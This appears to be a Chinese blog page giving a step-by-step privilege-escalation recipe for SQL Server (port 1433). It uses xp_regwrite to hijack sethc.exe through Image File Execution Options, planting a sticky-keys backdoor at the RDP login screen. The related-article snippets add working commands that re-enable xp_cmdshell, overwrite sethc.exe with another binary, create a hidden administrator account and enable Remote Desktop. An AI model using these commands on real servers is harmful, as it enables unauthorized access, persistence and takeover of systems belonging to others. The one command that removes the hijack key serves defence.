1433映像劫持后门提权

最新推荐文章于 2023-08-17 12:45:25 发布
最新推荐文章于 2023-08-17 12:45:25 发布
阅读量2.3k 收藏
点赞数

首先:
1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)
2.服务器的粘滞键功能无损,只要可以正常弹出即可
3.服务器未禁止注册表编辑(即写入功能)

sql命令读取服务器终端端口:

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp','PortNumber'

 

1.sql命令查询注册表粘滞键是否被劫持

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

cnbird2008
关注
〖教程〗RDP会话劫持 Ladon无密码登陆管理员桌面会话
K8哥哥
08-08 1270
前言 Windows系统下,tscon或任务管理器可被用来切换远程桌面的会话。正常情况下,切换会话时需要提供登录密码,但在SYSTEM权限下可够绕过验证,无密码实现未授权登录。该漏洞在2017年由以色列安全研究员Alexander Korznikov在个人博客中披露,mimikat里面也有该功能,为了方便Ladon也添加了该功能。 背景 实战中某个项目的内网HTTPS证书有问题,特别奇葩不知为何,代理或CMD下无法连WEBSHELL,还有些远程连接程序管理员连着远程机器,特别是连着数据库的在自动处理数
粘滞后门详述
发哥微课堂
03-07 8721
0x00:介绍 首先介绍一下粘滞粘滞很多人都知道,windows 系统下连续按 5 次 shift 可调出其程序,但使用可能有一部分人不太了解,毕竟这个功能一般我们都用不到,粘滞是为了那些按钮有困难的人设计的,也可理解为残疾,就是按困难,一次只能按一个的这种需求,那么如果用 ctrl+c,ctrl+v 这种快捷或者其他需要组合的时,就会有困难,不具备一次按两个或多个的能力,那么...
C++映像劫持后门实例分析
09-03
主要介绍了C++映像劫持后门,实例分析了C++映像劫持后门的原理与相关实现技巧,有助于进一步了解后门的原理,需要的朋友可以参考下
权限持久化---映像劫持检测(Shift后门
08-27 447
映像劫持说白了还是利用了windows的一些特性,当你点击可执行文件进行执行时,系统并不会直接就对可执行文件进行执行,而是首先对注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options,这个路径下面如果存在和该程序名称完全相同的子,就查询对应子健中包含的“Dubugger”值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。 比较常用的是.
C语言,后门程序,C++映像劫持后门实例分析
weixin_30317869的博客
05-18 255
// freeheart.cpp : Defines the entry point for the console application.//学习交流使用,违法使用后果自负。// by:cnblogs.com/blogg time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i// argv 2 = name.exe// argv 3 = 1 ...
1433弱口令映像劫持后门快速提权
weixin_30765505的博客
09-26 214
提权条件:1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)2.服务器的粘滞功能无损,只要可以正常弹出即可3.服务器未禁止注册表编辑(即写入功能)罗嗦一句:1433提权没有一种方法是万能,有时要多种方法结合,管理员的安全意识都在提高,现在没有几年前那么单纯的cmdshll就能提起来的了开始sqltools登录目标服务器:运行工具的dos命令,发现Error Message:xpsq...
Windows权限维持—自启动&映像劫持&粘滞&辅助屏保后门&WinLogon
最新发布
剁椒鱼头没剁椒的博客
08-17 1680
在Windows系统中,很多后门利用的方式不是太会区别在域中还是单机上,只是需要考虑在没有网络情况下,如何将shell反弹回来,就比如,在域中一个无网络的主机和一台有网络的主机,前期通过有网络的主机转发上线到无网络主机上,那么我们木马是不是也可以这样设置,在无网络中设置一个正向木马,让其在运行,在有网络中设置一个反向的木马,让其运行,那么我们去连接的时候只要去连接反向木马就可以了,然后在通过这个反向木马去连接正向木马,不就可以了。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。
Linux系统调用劫持:技术原理、应用及检测.pdf
09-07
Linux系统调用劫持是一种黑客技术,用于在操作系统内核层面植入后门,以保持对系统的非法访问。这种技术常被用于制作rootkit,rootkit是攻击者用来隐藏其活动和保留管理员权限的工具集合。在Linux环境中,尤其是基于...
1433提权1433提权1433提权
03-19
1433提权,很艰难的提权1433提权1433提权1433提权1433提权1433提权1433提权
1433口令提权的详细过程
weixin_30758821的博客
05-11 205
前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗.其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、 ...
1433提权工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第二步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net提权出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
1433入侵各种修复、提权、错误处理集合资料
07-31
里面集合了各种提权过程中出现的问题解决办法,如果在里面都找不到解决办法,那基本这台鸡鸡提权没戏!
sa提權技巧之xp_regwrite 替換sethc.exe
06-19
sa提權技巧之xp_regwrite 替換sethc.exe
1433-exp sa口令批量提权
01-30
1433,sa口令提权,批量,直接导入口令,实现批量提权下载执行exe
SA提权辅助
信安路上……
03-18 548
SA提权辅助: 1.判断扩展存储是否存在: select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell' select count(*) from master.dbo.sysobjects where name='xp_regread' 恢复: exec sp_drop...
第三方组件提权-SQL server提权
Love&Share
11-20 2600
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
映像劫持 IFEO 病毒查杀
loadingbupt的专栏
10-17 757
CSDN 好久没来了  刚刚写了一篇  发表后居然找不到了    郁闷!!还得重写好久没写东西了 主要是最近实在是太忙了   在公司做MPC 8349   又要调一些路由器上的bug  实在是没有时间。最近加了条内存  感觉电脑快多了  开机艘一下 就过去了  (担心电脑烧了)   开机后想重新映射一下磁盘 于是就写了一个.bat文件 运用突然提示找不到该文件    不会吧  第一反应中毒 了 
Windows提权之Mssql(sql server)数据库提权(xp_cmdshell提权)
mrx56的博客
05-18 1287
利用大马或者webshell管理工具登录mssql数据库,执行以下sql命令检查xp_cmdshell是否存在。也可以利用SQL注入。如果xplog70.dll也删除了可以自己上传一个或者执行以下命令恢复。结果为1,则证明存在。当结果为0时,可以通过下列命令恢复。使用xp_cmdshel执行命令
Windows服务启动方式与映像劫持解析
"这篇文档详细介绍了Windows服务启动的两种主要方式以及映像劫持的概念。" 在Windows操作系统中,服务的启动主要有两种形式:DLL通过svchost进程和EXE注册形式的服务。这两种方法都是由服务控制管理器(services....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值